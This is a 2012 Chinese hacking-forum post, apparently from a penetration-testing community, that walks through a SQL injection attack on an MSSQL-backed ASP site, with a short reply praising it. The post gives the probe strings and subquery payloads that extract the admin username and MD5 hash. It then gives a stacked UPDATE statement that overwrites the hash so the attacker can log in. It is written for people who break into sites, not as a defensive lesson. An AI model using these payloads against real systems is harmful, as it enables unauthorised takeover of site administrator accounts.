中国网络渗透测试联盟
标题:
SQL注入直接修改管理员密码的MD5值
[打印本页]
作者:
admin
时间:
2012-9-13 17:55
标题:
SQL注入直接修改管理员密码的MD5值
经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
6 U6 c2 X3 W V0 S$ K
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
5 E3 [3 |1 ^* {7 [# ]! t$ p/ l
测试如下:
0 w# l4 S2 q" I: Q
http://www.tmdsb.com/news.asp?id=121
9 @, p; o9 i( L, {; d- B
在地址后输入单引号,显示
) f/ g3 Z; u. T1 j' A
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
6 @* i* G) r- y( Z7 s" b9 v s( ^1 h
字符串 ’’’ 之前有未闭合的引号
: ?4 b* n( L5 N8 y$ G
/news/tmdws.asp,行63
( b% Z+ I* p6 Y- X; o) k2 V
说明没有过滤单引号且数据库是MSSQL.
$ d$ f8 A5 [$ B ^+ ~) t
and 1=1正常。and 1=2出错。肯定存在注入
* l& w& p3 a8 {/ }6 L8 B" C+ q
接着输入
# C/ [# `6 q, g2 b# O( c9 B5 c9 p
http://www.tmdsb.com/news.asp?id=1
or admin_user in (select id from admin)
# W- P; q! i8 q, G
得到帐号为:admin
- P$ O7 o: b4 T
http://www.tmdsb.com/news.asp?id=121
or admin_password in (select id from admin)
- f1 H- Q! p$ K
得到密码为:a4716077c2ba075c
8 O" I( ~. r9 t4 F7 P! a- f9 R( s
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
( N& p _, ^5 F: \: }, s+ D: f
命令如下 :
$ i) K: s; d; u8 }9 e
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
5 `; u' _" O% E+ r* \
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的
作者:
angel
时间:
2012-9-14 16:22
没法说 一个字牛
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2